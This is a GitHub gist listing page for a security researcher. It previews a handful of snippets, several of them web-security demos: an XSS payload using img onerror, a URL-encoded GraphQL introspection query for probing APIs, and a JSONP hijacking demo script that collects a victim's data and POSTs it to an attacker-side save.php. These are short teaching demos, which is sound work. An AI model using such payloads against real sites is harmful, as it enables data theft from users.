Skip to content

Instantly share code, notes, and snippets.

View yehgdotnet's full-sized avatar

Aung Khant yehgdotnet

91 followers · 204 following
View GitHub Profile
@yehgdotnet
yehgdotnet / gist:68e48c96a9cce0ad96e7870c66e17088
Created October 31, 2019 05:11
newpage whitespace character xss
https://jsfiddle.net/qa231rnp/
<img src=x onerror=prompt(1)>
@yehgdotnet
yehgdotnet / GraphQL-Introspection-Query-Url-Encoded
Created October 31, 2019 03:53 — forked from szski/GraphQL-Introspection-Query-Url-Encoded
Append this string after https://examplegqlapi.com/?query= to test for introspection query
query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields%28includeDeprecated%3A%20true%29%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20isDeprecated%0A%20%20%
@yehgdotnet
yehgdotnet / vpn.md
Created October 23, 2019 11:50 — forked from joepie91/vpn.md
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin. There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

Why not?

@yehgdotnet
yehgdotnet / execute_file.sh
Created July 4, 2018 06:43
Bash read line by line
# 1st param is command; #2nd param is file
while read -r line; do $1 $line ; done < $2
@yehgdotnet
yehgdotnet / Readable-Font.user.js
Created July 1, 2018 05:53
TamperMonkey Use Readable Font from MEDIUM.COM
// ==UserScript==
// @name Readable_Font
// @namespace http://yehg.net
// @version 0.1
// @author yehg.net
// @description TamperMonkey Use Readable Font from MEDIUM.COM
// @author You
// @match http://your-favourite-news-site/*
// @grant none
// ==/UserScript==
@yehgdotnet
yehgdotnet / secure.jsonp
Created June 18, 2018 02:55
JSONP Secure example
<script>
function SavetoServer(data){
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "save.php", true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send(data);
}
function parseResponse(s){
stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
@yehgdotnet
yehgdotnet / Insecure Example
Last active June 13, 2018 06:12
JSONP Hijacking Demo
<!-- -->
<script>
function SavetoServer(data){
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "save.php", true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.send(data);
}
function parseResponse(s){
@yehgdotnet
yehgdotnet / tlds
Created June 12, 2018 07:39 — forked from di/tlds
Valid Two-Letter Top Level Domains
ac
ad
ae
af
ag
ai
al
am
an
ao
@yehgdotnet
yehgdotnet / 1.json
Last active June 12, 2018 02:51
JSON(P)
{
"name" : "hacker",
"level" : "1337"
}
@yehgdotnet
yehgdotnet / gplaycli.conf
Created April 27, 2018 02:54
gplaycli.conf
gplaycli.conf
[Credentials]
gmail_address=
gmail_password=
token=True
android_ID=
language=en_US
token_url=
[Cache]
token=~/.cache/gplaycli/token